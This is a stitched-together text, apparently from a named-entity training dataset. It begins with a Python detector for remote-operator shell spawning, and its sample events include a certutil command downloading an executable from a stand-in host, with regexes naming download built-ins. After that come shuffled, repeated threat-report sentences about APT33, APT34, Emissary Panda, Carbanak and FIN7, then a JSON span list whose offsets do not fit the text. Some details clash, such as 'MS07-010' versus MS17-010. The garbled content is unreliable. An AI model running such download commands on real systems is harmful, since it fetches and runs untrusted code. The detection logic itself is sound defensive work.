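The MainModule behaviour described above (a remote operator driving CMD.exe and moving files in and out) shows up in endpoint telemetry as shells spawned one command at a time by an unusual parent. The rules below are an added example, not Group-IB's detection logic. The Sysmon-style events are constructed; the assumption that the implant runs from a user-writable directory such as AppData is this example's own (the text does not say where Silence's trojan is installed); and the download built-ins it watches (certutil, bitsadmin, curl) are a general heuristic for shell-only file transfer, not tools the report attributes to Silence.

```python
import re
from typing import Dict, List, Tuple

# Added example; constructed events, not telemetry from the incidents described above.

SHELLS = {"cmd.exe", "powershell.exe"}
# Parent locations a user-mode implant is commonly dropped into (assumption of this example).
USER_WRITABLE = re.compile(r"\\(AppData\\|Users\\Public\\|ProgramData\\|Temp\\)", re.IGNORECASE)
# Built-ins that give a shell-only operator a file download without a dedicated tool.
TRANSFER_BUILTINS = re.compile(
    r"\b(certutil(\.exe)?\s+.*-urlcache|bitsadmin(\.exe)?\s+/transfer|curl(\.exe)?\s+.*\s-o\s)",
    re.IGNORECASE,
)
REPEAT_THRESHOLD = 3  # third shell from one parent: an operator issuing commands one by one


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Stateless rules for a single process-creation event."""
    hits = []
    if basename(event.get("Image", "")) not in SHELLS:
        return hits
    if USER_WRITABLE.search(event.get("ParentImage", "")):
        hits.append("shell-from-user-writable-parent")
    if TRANSFER_BUILTINS.search(event.get("CommandLine", "")):
        hits.append("file-transfer-via-builtin")
    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Stateless rules plus a per-parent shell counter; returns (time, parent, rule names)."""
    alerts = []
    shells_per_parent: Dict[str, int] = {}
    for ev in events:
        hits = evaluate(ev)
        if basename(ev.get("Image", "")) in SHELLS:
            key = ev.get("ParentProcessId", "")
            shells_per_parent[key] = shells_per_parent.get(key, 0) + 1
            if shells_per_parent[key] == REPEAT_THRESHOLD:
                hits.append("repeated-shell-spawn-from-parent")
        if hits:
            alerts.append((ev["UtcTime"], ev["ParentImage"], hits))
    return alerts


# Constructed Sysmon-style events. The first is a user's ordinary shell and must not fire.
SAMPLE_EVENTS = [
    {"UtcTime": "2019-02-16 09:00:01", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ParentProcessId": "1234",
     "CommandLine": "cmd.exe /c dir"},
    {"UtcTime": "2019-02-16 09:12:07", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\svchost.exe", "ParentProcessId": "4412",
     "CommandLine": "cmd.exe /c whoami"},
    {"UtcTime": "2019-02-16 09:12:19", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\svchost.exe", "ParentProcessId": "4412",
     "CommandLine": "cmd.exe /c net view /domain"},
    {"UtcTime": "2019-02-16 09:12:40", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\svchost.exe", "ParentProcessId": "4412",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://example.invalid/upd.exe %TEMP%\upd.exe"},
    {"UtcTime": "2019-02-16 09:13:02", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentProcessId": "700",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for when, parent, hits in detect(SAMPLE_EVENTS):
        print(when, parent, hits)
```

The per-parent counter is what separates an operator-driven shell from a one-off script: a RAT that executes each operator command through a fresh cmd.exe produces a run of short-lived shells under the same parent, which a single-event rule cannot see.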
These RAT families are discussed in Novetta\u2019s other report on the Lazarus Group\u2019s RAT and Staging capabilities . Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a Cyber Espionage operation to collect information from defense , aerospace and petrochemical organizations . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash . CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering . Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East , as well as across Europe and in the United States . These malware families have a rich history of being used in many targeted attacks against government and private organizations . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The samples we analyzed originated from the Philippines . APT10 frequently targets the Southeast Asia region . Both of the loader\u2019s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures and code associated with APT10 . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . Also , the certificate embedded in the Quasar sample was issued on 22.12.2018 , which correlates with the file\u2019s compilation date . 
Over the past three months , Recorded Future\u2019s Insikt Group has observed an increase in APT33\u2019s ( also known as Elfin ) infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous expos\u00e9s of their activity . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese Cyber Espionage group . Almost 60% of the suspected APT33 domains that were classified to malware families were related to njRAT infections , a RAT not previously associated with APT33 activity . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns and webshells . 
Symantec\u2019s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . FireEye also noted in their 2017 report that the online handle xman_1365_x , \u201d found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . Recorded Future\u2019s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33\u2019s domain and hosting infrastructure in an effort to identify recent activity . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . 
Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . While we haven\u2019t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . 
Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . On June 19 , 2019 , FireEye\u2019s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . A backdoor that communicates with a single command and control server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . FireEye\u2019s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . 
Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . A Carbanak trademark in cyberattacks remains the use of Cobalt Strike \u2013 a powerful pentesting tool designed for exploiting and executing malicious code , simulating post-exploitation actions of advanced threat actors \u2013 which allows them to infiltrate the organization , move laterally , exfiltrate data , and deploy anti-forensic and evasion tools . However , this action doesn\u2019t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . Bitdefender\u2019s forensics and investigation team was contacted to look into a security incident that started in May 2018 with an email received by two of the bank\u2019s employees . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . Its purpose remains to manipulate financial assets , such as transferring funds from bank accounts or taking over ATM infrastructures and instructing them to dispense cash at predetermined time intervals . If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . 
The actors uploaded a variety of tools that they used to perform additional activities on the compromised network , such as dumping credentials , as well as locating and pivoting to additional systems on the network . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked as CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Bitdefender\u2019s investigation shows the attackers\u2019 main methods remain to quietly infiltrate the infrastructure by establishing a foothold on an employee\u2019s system , then move laterally across the infrastructure or elevate privileges to find critical systems that manage financial transactions or ATM networks . We also found the China Chopper webshell on the SharePoint servers , which has also been used by the Emissary Panda threat group . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they used to sideload a malicious DLL that has code overlaps with known Emissary Panda attacks . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . 
In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 (checker1.exe) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . we will provide an analysis of the HyperBro tool in an upcoming section . 
However , using NCC Group\u2019s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822 ) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign .", "spans": [{"start": 17, "end": 25, "label": "Organization"}, {"start": 91, "end": 102, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}, {"start": 180, "end": 185, "label": "System"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 252, "end": 258, "label": "System"}, {"start": 278, "end": 296, "label": "Indicator"}, {"start": 366, "end": 384, "label": "Indicator"}, {"start": 413, "end": 419, "label": "Malware"}, {"start": 462, "end": 469, "label": "Indicator"}, {"start": 653, "end": 660, "label": "Malware"}, {"start": 692, "end": 699, "label": "Organization"}, {"start": 714, "end": 733, "label": "Organization"}, {"start": 745, "end": 753, "label": "Organization"}, {"start": 758, "end": 772, "label": "Organization"}, {"start": 928, "end": 934, "label": "Organization"}, {"start": 1232, "end": 1237, "label": "System"}, {"start": 1352, "end": 1364, "label": "Malware"}, {"start": 1439, "end": 1445, "label": "Organization"}, {"start": 1448, "end": 1455, "label": "Organization"}, {"start": 1485, "end": 1497, "label": "Organization"}, 
{"start": 1561, "end": 1567, "label": "Organization"}, {"start": 1578, "end": 1585, "label": "Malware"}, {"start": 1622, "end": 1627, "label": "Organization"}, {"start": 1705, "end": 1716, "label": "Organization"}, {"start": 1869, "end": 1888, "label": "Organization"}, {"start": 1891, "end": 1900, "label": "Organization"}, {"start": 1907, "end": 1917, "label": "Organization"}, {"start": 1941, "end": 1949, "label": "Organization"}, {"start": 2035, "end": 2041, "label": "Organization"}, {"start": 2094, "end": 2101, "label": "System"}, {"start": 2132, "end": 2137, "label": "Organization"}, {"start": 2241, "end": 2247, "label": "Organization"}, {"start": 2263, "end": 2268, "label": "Organization"}, {"start": 2293, "end": 2305, "label": "Indicator"}, {"start": 2344, "end": 2353, "label": "Organization"}, {"start": 2374, "end": 2381, "label": "Organization"}, {"start": 2421, "end": 2433, "label": "Organization"}, {"start": 2478, "end": 2484, "label": "Organization"}, {"start": 2487, "end": 2497, "label": "Organization"}, {"start": 2504, "end": 2514, "label": "Organization"}, {"start": 2643, "end": 2650, "label": "Organization"}, {"start": 2661, "end": 2666, "label": "Organization"}, {"start": 2739, "end": 2746, "label": "Organization"}, {"start": 2749, "end": 2758, "label": "Organization"}, {"start": 2763, "end": 2776, "label": "Organization"}, {"start": 2793, "end": 2797, "label": "Organization"}, {"start": 2972, "end": 2979, "label": "Organization"}, {"start": 2982, "end": 2986, "label": "Organization"}, {"start": 3013, "end": 3025, "label": "Organization"}, {"start": 3232, "end": 3243, "label": "Organization"}, {"start": 3362, "end": 3369, "label": "Indicator"}, {"start": 3446, "end": 3456, "label": "Organization"}, {"start": 3461, "end": 3468, "label": "Organization"}, {"start": 3469, "end": 3482, "label": "Organization"}, {"start": 3542, "end": 3547, "label": "Organization"}, {"start": 3574, "end": 3581, "label": "Indicator"}, {"start": 3628, "end": 3633, "label": 
"Organization"}, {"start": 3743, "end": 3749, "label": "Organization"}, {"start": 3836, "end": 3841, "label": "Organization"}, {"start": 3856, "end": 3861, "label": "Organization"}, {"start": 4033, "end": 4039, "label": "Indicator"}, {"start": 4148, "end": 4165, "label": "Organization"}, {"start": 4207, "end": 4214, "label": "Organization"}, {"start": 4229, "end": 4234, "label": "Organization"}, {"start": 4339, "end": 4349, "label": "Organization"}, {"start": 4443, "end": 4448, "label": "Organization"}, {"start": 4709, "end": 4714, "label": "Organization"}, {"start": 5239, "end": 5244, "label": "Organization"}, {"start": 5309, "end": 5314, "label": "Organization"}, {"start": 5375, "end": 5380, "label": "Malware"}, {"start": 5431, "end": 5436, "label": "Organization"}, {"start": 5495, "end": 5504, "label": "Malware"}, {"start": 5509, "end": 5519, "label": "Malware"}, {"start": 5552, "end": 5557, "label": "Organization"}, {"start": 5576, "end": 5581, "label": "Organization"}, {"start": 5779, "end": 5784, "label": "Organization"}, {"start": 6003, "end": 6012, "label": "System"}, {"start": 6015, "end": 6025, "label": "Organization"}, {"start": 6026, "end": 6031, "label": "Organization"}, {"start": 6075, "end": 6086, "label": "Organization"}, {"start": 6089, "end": 6097, "label": "Organization"}, {"start": 6130, "end": 6140, "label": "Organization"}, {"start": 6208, "end": 6222, "label": "Organization"}, {"start": 6243, "end": 6248, "label": "Organization"}, {"start": 6310, "end": 6315, "label": "Organization"}, {"start": 6318, "end": 6323, "label": "Organization"}, {"start": 6330, "end": 6340, "label": "Organization"}, {"start": 6440, "end": 6455, "label": "Organization"}, {"start": 6476, "end": 6481, "label": "Organization"}, {"start": 6641, "end": 6648, "label": "Organization"}, {"start": 6752, "end": 6757, "label": "Organization"}, {"start": 6835, "end": 6852, "label": "Organization"}, {"start": 6853, "end": 6859, "label": "Organization"}, {"start": 6860, "end": 
6865, "label": "Organization"}, {"start": 6886, "end": 6891, "label": "Organization"}, {"start": 7124, "end": 7128, "label": "Organization"}, {"start": 7330, "end": 7336, "label": "Organization"}, {"start": 7428, "end": 7443, "label": "Organization"}, {"start": 7569, "end": 7576, "label": "Organization"}, {"start": 7654, "end": 7660, "label": "Organization"}, {"start": 7716, "end": 7721, "label": "Organization"}, {"start": 7743, "end": 7748, "label": "Indicator"}, {"start": 7969, "end": 7984, "label": "Organization"}, {"start": 8084, "end": 8096, "label": "Organization"}, {"start": 8204, "end": 8209, "label": "Organization"}, {"start": 8302, "end": 8310, "label": "Organization"}, {"start": 8350, "end": 8355, "label": "Organization"}, {"start": 8494, "end": 8499, "label": "Organization"}, {"start": 8679, "end": 8682, "label": "Malware"}, {"start": 8820, "end": 8825, "label": "Organization"}, {"start": 9060, "end": 9070, "label": "Malware"}, {"start": 9113, "end": 9118, "label": "Organization"}, {"start": 9196, "end": 9201, "label": "Organization"}, {"start": 9219, "end": 9229, "label": "Malware"}, {"start": 9340, "end": 9347, "label": "Organization"}, {"start": 9411, "end": 9429, "label": "Organization"}, {"start": 9553, "end": 9558, "label": "Malware"}, {"start": 9739, "end": 9748, "label": "Organization"}, {"start": 9751, "end": 9757, "label": "Organization"}, {"start": 9764, "end": 9774, "label": "Organization"}, {"start": 9824, "end": 9836, "label": "Organization"}, {"start": 9902, "end": 9912, "label": "Malware"}, {"start": 9954, "end": 9959, "label": "Organization"}, {"start": 9962, "end": 9967, "label": "Organization"}, {"start": 10279, "end": 10284, "label": "Organization"}, {"start": 10322, "end": 10329, "label": "Organization"}, {"start": 10362, "end": 10371, "label": "Organization"}, {"start": 10427, "end": 10434, "label": "Vulnerability"}, {"start": 10465, "end": 10472, "label": "Organization"}, {"start": 10580, "end": 10584, "label": "Indicator"}, 
{"start": 10609, "end": 10617, "label": "Indicator"}, {"start": 10736, "end": 10745, "label": "Organization"}, {"start": 10853, "end": 10858, "label": "Organization"}, {"start": 10875, "end": 10895, "label": "Organization"}, {"start": 10908, "end": 10915, "label": "Organization"}, {"start": 10987, "end": 10997, "label": "Indicator"}, {"start": 11002, "end": 11011, "label": "Indicator"}, {"start": 11019, "end": 11023, "label": "Malware"}, {"start": 11127, "end": 11132, "label": "Organization"}, {"start": 11135, "end": 11145, "label": "Indicator"}, {"start": 11279, "end": 11286, "label": "Organization"}, {"start": 11362, "end": 11370, "label": "Indicator"}, {"start": 11373, "end": 11383, "label": "Indicator"}, {"start": 11390, "end": 11399, "label": "Indicator"}, {"start": 11449, "end": 11457, "label": "Organization"}, {"start": 11628, "end": 11637, "label": "Organization"}, {"start": 11659, "end": 11667, "label": "Organization"}, {"start": 11776, "end": 11781, "label": "Organization"}, {"start": 11914, "end": 11923, "label": "Malware"}, {"start": 11981, "end": 11990, "label": "Organization"}, {"start": 12026, "end": 12031, "label": "Organization"}, {"start": 12256, "end": 12276, "label": "Indicator"}, {"start": 12365, "end": 12373, "label": "Organization"}, {"start": 12419, "end": 12432, "label": "Malware"}, {"start": 12900, "end": 12913, "label": "Organization"}, {"start": 13027, "end": 13032, "label": "System"}, {"start": 13056, "end": 13062, "label": "Organization"}, {"start": 13079, "end": 13087, "label": "Organization"}, {"start": 13170, "end": 13179, "label": "Organization"}, {"start": 13213, "end": 13216, "label": "Organization"}, {"start": 13298, "end": 13302, "label": "Organization"}, {"start": 13620, "end": 13626, "label": "Organization"}, {"start": 13740, "end": 13759, "label": "Malware"}, {"start": 13845, "end": 13859, "label": "Organization"}, {"start": 13889, "end": 13902, "label": "Vulnerability"}, {"start": 13906, "end": 13915, "label": 
"Organization"}, {"start": 13938, "end": 13951, "label": "Vulnerability"}, {"start": 14067, "end": 14080, "label": "Organization"}, {"start": 14335, "end": 14357, "label": "Organization"}, {"start": 14361, "end": 14373, "label": "Organization"}, {"start": 14394, "end": 14416, "label": "Malware"}, {"start": 14477, "end": 14491, "label": "Organization"}, {"start": 14582, "end": 14595, "label": "Vulnerability"}, {"start": 14802, "end": 14811, "label": "System"}, {"start": 14865, "end": 14868, "label": "System"}, {"start": 14938, "end": 14952, "label": "Organization"}, {"start": 15284, "end": 15293, "label": "System"}, {"start": 15336, "end": 15345, "label": "System"}, {"start": 15557, "end": 15570, "label": "Vulnerability"}, {"start": 15623, "end": 15644, "label": "Organization"}, {"start": 15653, "end": 15668, "label": "Organization"}, {"start": 15754, "end": 15763, "label": "System"}, {"start": 15788, "end": 15794, "label": "Organization"}, {"start": 15976, "end": 15982, "label": "Organization"}, {"start": 16018, "end": 16026, "label": "Malware"}, {"start": 16061, "end": 16075, "label": "Organization"}, {"start": 16128, "end": 16134, "label": "Organization"}, {"start": 16144, "end": 16157, "label": "Vulnerability"}, {"start": 16161, "end": 16168, "label": "Vulnerability"}, {"start": 16203, "end": 16225, "label": "Malware"}, {"start": 16276, "end": 16283, "label": "Organization"}, {"start": 16316, "end": 16330, "label": "Organization"}, {"start": 16353, "end": 16362, "label": "System"}, {"start": 16374, "end": 16398, "label": "Organization"}, {"start": 16422, "end": 16428, "label": "Organization"}, {"start": 16443, "end": 16460, "label": "Malware"}, {"start": 16475, "end": 16484, "label": "System"}, {"start": 16605, "end": 16619, "label": "Organization"}, {"start": 16651, "end": 16656, "label": "Organization"}, {"start": 16692, "end": 16700, "label": "Malware"}, {"start": 16734, "end": 16748, "label": "Organization"}, {"start": 16875, "end": 16884, "label": 
"Indicator"}, {"start": 16928, "end": 16941, "label": "Vulnerability"}, {"start": 16944, "end": 16955, "label": "Vulnerability"}, {"start": 16969, "end": 16977, "label": "Indicator"}, {"start": 17077, "end": 17083, "label": "System"}, {"start": 17095, "end": 17103, "label": "System"}, {"start": 17106, "end": 17116, "label": "Indicator"}, {"start": 17189, "end": 17202, "label": "Indicator"}, {"start": 17274, "end": 17287, "label": "Indicator"}, {"start": 17325, "end": 17333, "label": "Indicator"}, {"start": 17380, "end": 17383, "label": "Organization"}, {"start": 17500, "end": 17503, "label": "System"}, {"start": 17541, "end": 17544, "label": "Organization"}, {"start": 17574, "end": 17588, "label": "Organization"}, {"start": 17631, "end": 17641, "label": "Malware"}, {"start": 17652, "end": 17660, "label": "Malware"}, {"start": 17705, "end": 17719, "label": "Malware"}, {"start": 17991, "end": 18003, "label": "Indicator"}, {"start": 18016, "end": 18035, "label": "Indicator"}, {"start": 18052, "end": 18116, "label": "Indicator"}, {"start": 18153, "end": 18162, "label": "Malware"}, {"start": 18182, "end": 18196, "label": "Organization"}]} {"text": "While analyzing a campaign run by the Gamaredon group , FortiGuard Labs discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis . The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 ( EternalBlue ) that we saw uploaded to the other errr.aspx webshell . 
According to Microsoft\u2019s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 ( EternalBlue ) vulnerability patched in MS17-010 . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers . We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . The group\u2019s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . 
In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . In 2018-2019 , researchers of Kaspersky Lab\u2019s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email APTes , leading us to think that more than 130 companies had been targeted by the end of 2018 . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . Given FIN7\u2019s previous use of false security companies , we decided to look deeper into this one . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . FIN7\u2019s last campaigns were targeting banks in Europe and Central America . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . 
This threat actor stole suspected of stealing \u20ac13 million from Bank of Valetta , Malta earlier this year . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc. , and can act as a keylogger . They also use AutoIT droppers , password-protected EXE files and even ISO images . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste\u201d from a previously unknown APT . FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste . Quite recently , FIN7 threat actors typosquatted the brand Digicert\u201d using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . we observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . 
